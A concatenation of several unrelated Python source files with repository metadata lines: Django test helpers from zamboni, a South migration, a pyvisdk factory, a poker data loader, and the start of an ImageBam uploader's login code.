try:
super(MockEsMixin, cls).setUpClass()
except Exception:
# We need to unpatch here because tearDownClass will not be
# called.
if cls.mock_es:
stop_es_mock()
raise
@classmethod
def tearDownClass(cls):
try:
super(MockEsMixin, cls).tearDownClass()
finally:
if cls.mock_es:
stop_es_mock()
class MockBrowserIdMixin(object):
def mock_browser_id(self):
cache.clear()
real_login = self.client.login
def fake_login(email, password=None):
with mock_browserid(email=email):
return real_login(email=email, assertion='test',
audience='test')
self.client.login = fake_login
def login(self, profile):
email = getattr(profile, 'email', profile)
if '@' not in email:
email += '@mozilla.com'
assert self.client.login(email=email, password='password')
JINJA_INSTRUMENTED = False
class ClassFixtureTestCase(test.TestCase):
""" Based on the changes to TestCase (& TransactionTestCase) in Django1.8.
Fixtures are loaded once per class, and a class setUpTestData method is
added to be overridden by sublasses. `transaction.atomic()` is used to
achieve test isolation.
See orginal code:
https://github.com/django/django/blob/1.8b2/django/test/testcases.py
#L747-990.
A noteable difference is that this class assumes the database supports
transactions. This class will be obsolete on upgrade to 1.8.
"""
fixtures = None
@classmethod
def _databases_names(cls, include_mirrors=True):
# If the test case has a multi_db=True flag, act on all databases,
# including mirrors or not. Otherwise, just on the default DB.
if getattr(cls, 'multi_db', False):
return [alias for alias in connections
if (include_mirrors or
connections[alias].settings_dict['TEST']['MIRROR'])]
else:
return [DEFAULT_DB_ALIAS]
@classmethod
def _enter_atomics(cls):
"""Helper method to open atomic blocks for multiple databases"""
atomics = {}
for db_name in cls._databases_names():
atomics[db_name] = transaction.atomic(using=db_name)
atomics[db_name].__enter__()
return atomics
@classmethod
def _rollback_atomics(cls, atomics):
"""Rollback atomic blocks opened through the previous method"""
for db_name in reversed(cls._databases_names()):
transaction.set_rollback(True, using=db_name)
atomics[db_name].__exit__(None, None, None)
@classmethod
def setUpClass(cls):
super(ClassFixtureTestCase, cls).setUpClass()
cls.cls_atomics = cls._enter_atomics()
try:
if cls.fixtures:
for db_name in cls._databases_names(include_mirrors=False):
call_command('loaddata', *cls.fixtures, **{
'verbosity': 0,
'commit': False,
'database': db_name,
})
cls.setUpTestData()
except Exception:
cls._rollback_atomics(cls.cls_atomics)
raise
@classmethod
def tearDownClass(cls):
cls._rollback_atomics(cls.cls_atomics)
for conn in connections.all():
conn.close()
super(ClassFixtureTestCase, cls).tearDownClass()
@classmethod
def setUpTestData(cls):
"""Load initial data for the TestCase"""
pass
def _should_reload_connections(self):
return False
def _fixture_setup(self):
assert not self.reset_sequences, (
'reset_sequences cannot be used on TestCase instances')
self.atomics = self._enter_atomics()
def _fixture_teardown(self):
self._rollback_atomics(self.atomics)
def _post_teardown(self):
"""Patch _post_teardown so connections don't get closed.
In django 1.6's _post_teardown connections are closed and we don't want
that to happen after each test anymore. This method isn't copied from
Django 1.8 code.
https://github.com/django/django/blob/1.6.10/django/test/testcases.py
#L788
"""
if not self._should_reload_connections():
real_connections_all = connections.all
connections.all = lambda: []
super(ClassFixtureTestCase, self)._post_teardown()
if not self._should_reload_connections():
connections.all = real_connections_all
class TestCase(MockEsMixin, MockBrowserIdMixin, ClassFixtureTestCase):
"""Base class for all mkt tests."""
client_class = Client
def shortDescription(self):
# Stop nose using the test docstring and instead the test method name.
pass
def _pre_setup(self):
super(TestCase, self)._pre_setup()
# Clean the slate.
cache.clear()
post_request_task._discard_tasks()
trans_real.deactivate()
trans_real._translations = {} # Django fails to clear this cache.
trans_real.activate(settings.LANGUAGE_CODE)
self.mock_browser_id()
global JINJA_INSTRUMENTED
if not JINJA_INSTRUMENTED:
import jinja2
old_render = jinja2.Template.render
def instrumented_render(self, *args, **kwargs):
context = dict(*args, **kwargs)
test.signals.template_rendered.send(sender=self, template=self,
context=context)
return old_render(self, *args, **kwargs)
jinja2.Template.render = instrumented_render
JINJA_INSTRUMENTED = True
def _post_teardown(self):
mkt.set_user(None)
clean_translations(None) # Make sure queued translations are removed.
super(TestCase, self)._post_teardown()
@contextmanager
def activate(self, locale=None):
"""Active a locale."""
old_locale = translation.get_language()
if locale:
translation.activate(locale)
yield
translation.activate(old_locale)
def assertNoFormErrors(self, response):
"""Asserts that no form in the context has errors.
If you add this check before checking the status code of the response
you'll see a more informative error.
"""
# TODO(Kumar) liberate upstream to Django?
if response.context is None:
# It's probably a redirect.
return
if len(response.templates) == 1:
tpl = [response.context]
else:
# There are multiple contexts so iter all of them.
tpl = response.context
for ctx in tpl:
for k, v in ctx.iteritems():
if isinstance(v, (forms.BaseForm, forms.formsets.BaseFormSet)):
if isinstance(v, forms.formsets.BaseFormSet):
# Concatenate errors from each form in the formset.
msg = '\n'.join(f.errors.as_text() for f in v.forms)
else:
# Otherwise, just return the errors for this form.
msg = v.errors.as_text()
msg = msg.strip()
if msg != '':
self.fail('form %r had the following error(s):\n%s'
% (k, msg))
if hasattr(v, 'non_field_errors'):
self.assertEquals(v.non_field_errors(), [])
if hasattr(v, 'non_form_errors'):
self.assertEquals(v.non_form_errors(), [])
def assertLoginRedirects(self, response, to, status_code=302):
# Not using urlparams, because that escapes the variables, which
# is good, but bad for assertRedirects which will fail.
self.assert3xx(response,
'%s?to=%s' % (reverse('users.login'), to), status_code)
def assert3xx(self, response, expected_url, status_code=302,
target_status_code=200):
"""Asserts redirect and final redirect matches expected URL.
Similar to Django's `assertRedirects` but skips the final GET
verification for speed.
"""
if hasattr(response, 'redirect_chain'):
# The request was a followed redirect
self.assertTrue(len(response.redirect_chain) > 0,
"Response didn't redirect as expected: Response"
" code was %d (expected %d)" %
(response.status_code, status_code))
url, status_code = response.redirect_chain[-1]
self.assertEqual(response.status_code, target_status_code,
"Response didn't redirect as expected: Final"
" Response code was %d (expected %d)" %
(response.status_code, target_status_code))
else:
# Not a followed redirect
self.assertEqual(response.status_code, status_code,
"Response didn't redirect as expected: Response"
" code was %d (expected %d)" %
(response.status_code, status_code))
url = response['Location']
scheme, netloc, path, query, fragment = urlsplit(url)
e_scheme, e_netloc, e_path, e_query, e_fragment = urlsplit(
expected_url)
if (scheme and not e_scheme) and (netloc and not e_netloc):
expected_url = urlunsplit(('http', 'testserver', e_path, e_query,
e_fragment))
self.assertEqual(
url, expected_url,
"Response redirected to '%s', expected '%s'" % (url, expected_url))
def assertLoginRequired(self, response, status_code=302):
"""
A simpler version of assertLoginRedirects that just checks that we
get the matched status code and bounced to the correct login page.
"""
assert response.status_code == status_code, (
'Response returned: %s, expected: %s'
% (response.status_code, status_code))
path = urlsplit(response['Location'])[2]
assert path == reverse('users.login'), (
'Redirected to: %s, expected: %s'
% (path, reverse('users.login')))
def assertSetEqual(self, a, b, message=None):
"""
This is a thing in unittest in 2.7,
but until then this is the thing.
Oh, and Django's `assertSetEqual` is lame and requires actual sets:
http://bit.ly/RO9sTr
"""
eq_(set(a), set(b), message)
eq_(len(a), len(b), message)
def assertCloseToNow(self, dt, now=None):
"""
Make sure the datetime is within a minute from `now`.
"""
# Try parsing the string if it's not a datetime.
if isinstance(dt, basestring):
try:
dt = dateutil_parser(dt)
except ValueError, e:
raise AssertionError(
'Expected valid date; got %s\n%s' % (dt, e))
if not dt:
raise AssertionError('Expected datetime; got %s' % dt)
dt_later_ts = time.mktime((dt + timedelta(minutes=1)).timetuple())
dt_earlier_ts = time.mktime((dt - timedelta(minutes=1)).timetuple())
if not now:
now = datetime.now()
now_ts = time.mktime(now.timetuple())
assert dt_earlier_ts < now_ts < dt_later_ts, (
'Expected datetime to be within a minute of %s. Got %r.' % (now,
dt))
def assertCORS(self, res, *verbs, **kw):
"""
Determines if a response has suitable CORS headers. Appends 'OPTIONS'
on to the list of verbs.
"""
headers = kw.pop('headers', None)
if not headers:
headers = ['X-HTTP-Method-Override', 'Content-Type']
eq_(res['Access-Control-Allow-Origin'], '*')
assert 'API-Status' in res['Access-Control-Expose-Headers']
assert 'API-Version' in res['Access-Control-Expose-Headers']
verbs = map(str.upper, verbs) + ['OPTIONS']
actual = res['Access-Control-Allow-Methods'].split(', ')
self.assertSetEqual(verbs, actual)
eq_(res['Access-Control-Allow-Headers'], ', '.join(headers))
def assertApiUrlEqual(self, *args, **kwargs):
"""
Allows equality comparison of two or more URLs agnostic of API version.
This is done by prepending '/api/vx' (where x is equal to the `version`
keyword argument or API_CURRENT_VERSION) to each string passed as a
positional argument if that URL doesn't already start with that string.
Also accepts 'netloc' and 'scheme' optional keyword arguments to
compare absolute URLs.
Example usage:
url = '/api/v1/apps/app/bastacorp/'
self.assertApiUrlEqual(url, '/apps/app/bastacorp1/')
# settings.API_CURRENT_VERSION = 2
url = '/api/v1/apps/app/bastacorp/'
self.assertApiUrlEqual(url, '/apps/app/bastacorp/', version=1)
"""
# Constants for the positions of the URL components in the tuple
# returned by urlsplit. Only here for readability purposes.
SCHEME = 0
NETLOC = 1
PATH = 2
version = kwargs.get('version', settings.API_CURRENT_VERSION)
scheme = kwargs.get('scheme', None)
netloc = kwargs.get('netloc', None)
urls = list(args)
prefix = '/api/v%d' % version
for idx, url in enumerate(urls):
urls[idx] = list(urlsplit(url))
if not urls[idx][PATH].startswith(prefix):
urls[idx][PATH] = prefix + urls[idx][PATH]
if scheme and not urls[idx][SCHEME]:
urls[idx][SCHEME] = scheme
if netloc and not urls[idx][NETLOC]:
urls[idx][NETLOC] = netloc
urls[idx] = SplitResult(*urls[idx])
eq_(*urls)
def make_price(self, price='1.00'):
price_obj, created = Price.objects.get_or_create(price=price,
name='1')
for region in [regions.USA.id, regions.RESTOFWORLD.id]:
PriceCurrency.objects.create(region=region, currency='USD',
price=price, tier=price_obj,
provider=PROVIDER_REFERENCE)
# Call Price transformer in order to repopulate _currencies cache.
Price.transformer([])
return price_obj
def make_premium(self, addon, price='1.00'):
price_obj = self.make_price(price=Decimal(price))
addon.update(premium_type=mkt.ADDON_PREMIUM)
addon._premium = AddonPremium.objects.create(addon=addon,
price=price_obj)
if hasattr(Price, '_currencies'):
del Price._currencies
return addon._premium
def create_sample(self, name=None, db=False, **kw):
if name is not None:
kw['name'] = name
kw.setdefault('percent', 100)
sample = Sample(**kw)
sample.save() if db else cache_sample(instance=sample)
return sample
def create_switch(self, name=None, db=False, **kw):
kw.setdefault('active', True)
if name is not None:
kw['name'] = name
switch = Switch(**kw)
switch.save() if db else cache_switch(instance=switch)
return switch
def create_flag(self, name=None, **kw):
if name is not None:
kw['name'] = name
kw.setdefault('everyone', True)
return Flag.objects.create(**kw)
@staticmethod
def grant_permission(user_obj, rules, name='Test Group'):
"""Creates group with rule, and adds user to group."""
group = Group.objects.create(name=name, rules=rules)
GroupUser.objects.create(group=group, user=user_obj)
return group
def remove_permission(self, user_obj, rules):
"""Remove a permission from a user."""
group = Group.objects.get(rules=rules)
GroupUser.objects.filter(user=user_obj, group=group).delete()
def days_ago(self, days):
return days_ago(days)
def trans_eq(self, trans, locale, localized_string):
eq_(Translation.objects.get(id=trans.id,
locale=locale).localized_string,
localized_string)
def extract_script_template(self, html, template_selector):
"""Extracts the inner JavaScript text/template from a html page.
Example::
>>> template = extract_script_template(res.content, '#template-id')
>>> template('#my-jquery-selector')
Returns a PyQuery object that you can refine using jQuery selectors.
"""
return pq(pq(html)(template_selector).html())
class MktPaths(object):
"""Mixin for getting common Marketplace Paths."""
def manifest_path(self, name):
return os.path.join(settings.ROOT,
'mkt/submit/tests/webapps/%s' % name)
def manifest_copy_over(self, dest, name):
with storage.open(dest, 'wb') as f:
copyfileobj(open(self.manifest_path(name)), f)
@staticmethod
def sample_key():
return os.path.join(settings.ROOT,
'mkt/webapps/tests/sample.key')
def sample_packaged_key(self):
return os.path.join(settings.ROOT,
'mkt/webapps/tests/sample.packaged.pem')
def mozball_image(self):
return os.path.join(settings.ROOT,
'mkt/developers/tests/addons/mozball-128.png')
def packaged_app_path(self, name):
return os.path.join(
settings.ROOT, 'mkt/submit/tests/packaged/%s' % name)
def packaged_copy_over(self, dest, name):
with storage.open(dest, 'wb') as f:
copyfileobj(open(self.packaged_app_path(name)), f)
def assert_no_validation_errors(validation):
"""Assert that the validation (JSON) does not contain a traceback.
Note that this does not test whether the addon passed
validation or not.
"""
if hasattr(validation, 'task_error'):
# FileUpload object:
error = validation.task_error
else:
# Upload detail - JSON output
error = validation['error']
if error:
print '-' * 70
print error
print '-' * 70
raise AssertionError("Unexpected task error: %s" %
error.rstrip().split("\n")[-1])
def _get_created(created):
"""
Returns a datetime.
If `created` is "now", it returns `datetime.datetime.now()`. If `created`
is set use that. Otherwise generate a random datetime in the year 2011.
"""
if created == 'now':
return datetime.now()
elif created:
return created
else:
return datetime(2011,
random.randint(1, 12), # Month
random.randint(1, 28), # Day
random.randint(0, 23), # Hour
random.randint(0, 59), # Minute
random.randint(0, 59)) # Seconds
def req_factory_factory(url='', user=None, post=False, data=None, **kwargs):
"""Creates a request factory, logged in with the user."""
req = RequestFactory()
if post:
req = req.post(url, data or {})
else:
req = req.get(url, data or {})
if user:
req.user = UserProfile.objects.get(id=user.id)
req.groups = user.groups.all()
else:
req.user = AnonymousUser()
req.check_ownership = partial(check_ownership, req)
req.REGION = kwargs.pop('region', mkt.regions.REGIONS_CHOICES[0][1])
req.API_VERSION = 2
for key in kwargs:
setattr(req, key, kwargs[key])
return req
user_factory_counter = 0
def user_factory(**kw):
"""
If not provided, email will be 'factoryuser<number>@mozilla.com'.
If email has no '@' it will be corrected to 'email@mozilla.com'
"""
global user_factory_counter
email = kw.pop('email', 'factoryuser%d' % user_factory_counter)
if '@' not in email:
email = '%s@mozilla.com' % email
user = UserProfile.objects.create(email=email, **kw)
if 'email' not in kw:
user_factory_counter = user.id + 1
return user
class ESTestCase(TestCase):
"""Base class for tests that require elasticsearch."""
# ES is slow to set up so this uses class setup/teardown. That happens
# outside Django transactions so be careful to clean up afterwards.
test_es = True
mock_es = False
exempt_from_fixture_bundling = True # ES doesn't support bundling (yet?)
@classmethod
def setUpClass(cls):
if not settings.RUN_ES_TESTS:
raise SkipTest('ES disabled')
cls.es = elasticsearch.Elasticsearch(hosts=settings.ES_HOSTS)
# The ES setting are set before we call super()
# because we may have indexation occuring in upper classes.
for key, index in settings.ES_INDEXES.items():
if not index.startswith('test_'):
settings.ES_INDEXES[key] = 'test_%s' % index
cls._SEARCH_ANALYZER_MAP = mkt.SEARCH_ANALYZER_MAP
mkt.SEARCH_ANALYZER_MAP = {
'english': ['en-us'],
'spanish': ['es'],
}
super(ESTestCase, cls).setUpClass()
@classmethod
def setUpTestData(cls):
try:
cls.es.cluster.health()
except Exception, e:
e.args = tuple([u'%s (it looks like ES is not running, '
'try starting it or set RUN_ES_TESTS=False)'
% e.args[0]] + list(e.args[1:]))
raise
for index in set(settings.ES_INDEXES.values()):
# Get the index that's pointed to by the alias.
try:
indices = cls.es.indices.get_aliases(index=index)
assert indices[index]['aliases']
except (KeyError, AssertionError):
# There's no alias, just use the index.
print 'Found no alias for %s.' % index
except elasticsearch.NotFoundError:
pass
# Remove any alias as well.
try:
cls.es.indices.delete(index=index)
except elasticsearch.NotFoundError as e:
print 'Could not delete index %r: %s' % (index, e)
for indexer in reindex.INDEXERS:
indexer.setup_mapping()
@classmethod
def tearDownClass(cls):
mkt.SEARCH_ANALYZER_MAP = cls._SEARCH_ANALYZER_MAP
super(ESTestCase, cls).tearDownClass()
def tearDown(self):
post_request_task._send_tasks()
super(ESTestCase, self).tearDown()
@classmethod
def refresh(cls, doctypes=None):
"""
Force an immediate refresh for the index(es) holding the given
doctype(s) in ES. Both a string corresponding to a single doctypes or a
list of multiple doctypes are accepted.
If there are tasks in the post_request_task queue, they are processed
first.
"""
post_request_task._send_tasks()
if doctypes:
if not isinstance(doctypes, (list, tuple)):
doctypes = [doctypes]
indexes = [settings.ES_INDEXES[doctype] for doctype in doctypes]
try:
cls.es.indices.refresh(index=indexes)
except elasticsearch.NotFoundError as e:
print "Could not refresh indexes '%s': %s" % (indexes, e)
@classmethod
def reindex(cls, model):
"""
Convenience method that re-save all instances of the specified model
and then refreshes the corresponding ES index.
"""
# Emit post-save signal so all of the objects get reindexed.
[o.save() for o in model.objects.all()]
cls.refresh(doctypes=model.get_indexer().get_mapping_type_name())
class WebappTestCase(TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.app = self.get_app()
def get_app(self):
return Webapp.objects.get(id=337141)
def make_game(self, app=None, rated=False):
app = make_game(self.app or app, rated)
def make_game(app, rated):
app.update(categories=['games'])
if rated:
make_rated(app)
app = app.reload()
return app
def make_rated(app):
app.set_content_ratings(
dict((body, body.ratings[0]) for body in
mkt.ratingsbodies.ALL_RATINGS_BODIES))
app.set_iarc_info(123, 'abc')
app.set_descriptors([])
app.set_interactives([])
|
Hitechverma/zamboni
|
mkt/site/tests/__init__.py
|
Python
|
bsd-3-clause
| 34,049
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Person.updated_at'
db.add_column('core_person', 'updated_at',
self.gf('django.db.models.fields.DateTimeField')(
auto_now=True, default=datetime.datetime(
2013, 1, 4, 0, 0), blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Person.updated_at'
db.delete_column('core_person', 'updated_at')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'core.alert': {
'Meta': {'object_name': 'Alert'},
'content': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'core.app': {
'Meta': {'object_name': 'App'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'icon_file': ('core.thumbs.ImageWithThumbsField', [], {'default': "'app_icons/default.jpg'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'stub': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'core.notification': {
'Meta': {'object_name': 'Notification'},
'actor': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'+'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'obj': ('django.db.models.fields.TextField', [], {}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'+'", 'to': "orm['auth.User']"}),
'target': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'user_notifications'", 'to': "orm['auth.User']"}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.TextField', [], {'max_length': '255'}),
'uuid': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'verb': ('django.db.models.fields.TextField', [], {'max_length': '255'}),
'viewed': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'core.officelocation': {
'Meta': {'object_name': 'OfficeLocation'},
'city': ('django.db.models.fields.CharField', [], {'max_length': '56'}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '12', 'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'street': ('django.db.models.fields.CharField', [], {'max_length': '56'}),
'suite': ('django.db.models.fields.CharField', [], {'max_length': '56', 'null': 'True', 'blank': 'True'}),
'zip': ('django.db.models.fields.CharField', [], {'max_length': '10'})
},
'core.orggroup': {
'Meta': {'object_name': 'OrgGroup'},
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.OrgGroup']", 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'core.person': {
'Meta': {'object_name': 'Person'},
'allow_tagging': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'current_projects': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'desk_location': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'email_notifications': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'home_phone': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mobile_phone': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'office_location': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.OfficeLocation']", 'null': 'True', 'blank': 'True'}),
'office_phone': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'org_group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.OrgGroup']", 'null': 'True', 'blank': 'True'}),
'photo_file': ('core.thumbs.ImageWithThumbsField', [], {'default': "'avatars/default.jpg'", 'max_length': '100'}),
'schools_i_attended': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'stub': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'stuff_ive_done': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'things_im_good_at': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'}),
'what_i_do': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
'core.wikihighlight': {
'Meta': {'object_name': 'WikiHighlight'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'posted_on': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '2048'})
},
'taggit.tag': {
'Meta': {'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '150'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'})
},
'taggit.tagcategory': {
'Meta': {'object_name': 'TagCategory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'})
},
'taggit.taggeditem': {
'Meta': {'object_name': 'TaggedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_tagged_items'", 'to': "orm['contenttypes.ContentType']"}),
'create_timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_items'", 'to': "orm['taggit.Tag']"}),
'tag_category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['taggit.TagCategory']", 'null': 'True'}),
'tag_creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_related'", 'null': 'True', 'to': "orm['auth.User']"})
}
}
complete_apps = ['core']
|
m3brown/collab
|
core/migrations/0002_add_keycache.py
|
Python
|
cc0-1.0
| 11,941
|
from model import Configuration
|
baverman/taburet
|
taburet/config/__init__.py
|
Python
|
mit
| 32
|
import logging
from pyvisdk.exceptions import InvalidArgumentError
########################################
# Automatically generated, do not edit.
########################################
log = logging.getLogger(__name__)
def StorageIORMConfigOption(vim, *args, **kwargs):
'''Configuration setting ranges for IORMConfigSpec object.'''
obj = vim.client.factory.create('ns0:StorageIORMConfigOption')
# do some validation checking...
if (len(args) + len(kwargs)) < 3:
raise IndexError('Expected at least 4 arguments got: %d' % len(args))
required = [ 'congestionThresholdOption', 'enabledOption', 'statsCollectionEnabledOption' ]
optional = [ 'dynamicProperty', 'dynamicType' ]
for name, arg in zip(required+optional, args):
setattr(obj, name, arg)
for name, value in kwargs.items():
if name in required + optional:
setattr(obj, name, value)
else:
raise InvalidArgumentError("Invalid argument: %s. Expected one of %s" % (name, ", ".join(required + optional)))
return obj
|
xuru/pyvisdk
|
pyvisdk/do/storage_iorm_config_option.py
|
Python
|
mit
| 1,080
|
../../../../share/pyshared/gnome_sudoku/sudoku.py
|
Alberto-Beralix/Beralix
|
i386-squashfs-root/usr/lib/python2.7/dist-packages/gnome_sudoku/sudoku.py
|
Python
|
gpl-3.0
| 49
|
import os
import numpy as np
import random
def load_training_data(folder, randomize_hands=False, randomize_players=False,
group=False, training_ratio=0.75, is_preflop=True,
max_files=None, min_hands=150, load_all=False):
fields = ['input', 'output']
if not is_preflop:
fields.insert(1, 'board')
arrays = [[] for _ in range(len(fields))]
files = os.listdir(folder)
if max_files:
files = files[:max_files]
for filename in files:
filename = os.path.join(folder, filename)
with open(filename, 'r') as f:
data = np.load(filename)
for i, field in enumerate(fields):
arrays[i].append(data[field])
if randomize_hands:
for j, player_arrays in enumerate(zip(*arrays)):
perm = np.random.permutation(len(player_arrays[0]))
for i, arr in enumerate(player_arrays):
arrays[i][j] = arr[perm]
if randomize_players:
arrays = zip(*arrays)
random.shuffle(arrays)
arrays = zip(*arrays)
if load_all:
if group:
for i, field in enumerate(arrays):
arrays[i] = np.concatenate(field)
if is_preflop:
return arrays
else:
return [arrays[0], arrays[1]], arrays[2]
new_arrays = []
for i, field in enumerate(arrays):
train = []
test = []
for player in field:
if len(player) < min_hands:
continue
ind = int(len(player) * training_ratio)
train.append(player[:ind])
test.append(player[ind:])
if group:
train, test = [np.concatenate(x) for x in [train, test]]
new_arrays.extend([train, test])
if not is_preflop:
rearrange = lambda x: [[x[0], x[2]], [x[1], x[3]], x[4], x[5]]
new_arrays = rearrange(new_arrays)
return new_arrays
|
session-id/poker-predictor
|
loaders.py
|
Python
|
apache-2.0
| 1,952
|
from __future__ import print_function, unicode_literals, division, absolute_import
import re
import io
import os
import sys
import logging
try:
from bs4 import BeautifulSoup
except ImportError:
logging.critical('You must install "beautifulsoup4" for this script to work. Try "pip install beautifulsoup4".')
sys.exit(1)
import config
from .image_host import BaseImageHost, ImageHostError
class ImageBam(BaseImageHost):
def __init__(self):
super(ImageBam, self).__init__()
if not (config.IMGBAM_USERNAME and config.IMGBAM_PASSWORD):
raise ImageHostError('You must specify your ImageBam username and password in config.py')
self.thumbnail_size = '350'
self.thumb_file_type = 'jpg'
self.gallery_options = '1'
def __repr__(self):
return 'ImageBam.com'
def login(self):
url = 'http://www.imagebam.com/login'
data = {
'action': 'true',
'nick': config.IMGBAM_USERNAME,
'pw': config.IMGBAM_PASSWORD
}
response = self.session.post(url, data=data)
response.raise_for_status()
# If we didn't get redirected, something went wrong
if not response.history:
soup = BeautifulSoup(response.text, "html.parser")
error_message = soup.find('div', class_='box_error')
if error_message:
